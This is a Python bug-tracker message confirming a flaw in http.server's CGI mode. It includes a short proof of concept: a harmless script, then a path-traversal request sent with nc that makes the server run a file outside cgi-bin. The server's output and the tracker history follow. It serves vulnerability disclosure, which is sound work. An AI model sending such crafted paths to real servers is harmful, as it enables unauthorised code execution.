Message201647
I can confirm the issue:
$ mkdir www
$ cd www
$ cat << EOF > badscript.sh
#!/bin/sh
echo hacked
EOF
$ chmod +x badscript.sh
$ ../python -m http.server --cgi
$ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 8000
HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/3.4.0a4+
Date: Tue, 29 Oct 2013 16:47:22 GMT
hacked |
|
Date |
User |
Action |
Args |
2013-10-29 16:48:40 | christian.heimes | set | recipients:
+ christian.heimes, georg.brandl, vstinner, larry, benjamin.peterson, Alexander.Kruppa |
2013-10-29 16:48:40 | christian.heimes | set | messageid: <1383065320.2.0.995297367448.issue19435@psf.upfronthosting.co.za> |
2013-10-29 16:48:40 | christian.heimes | link | issue19435 messages |
2013-10-29 16:48:39 | christian.heimes | create | |
|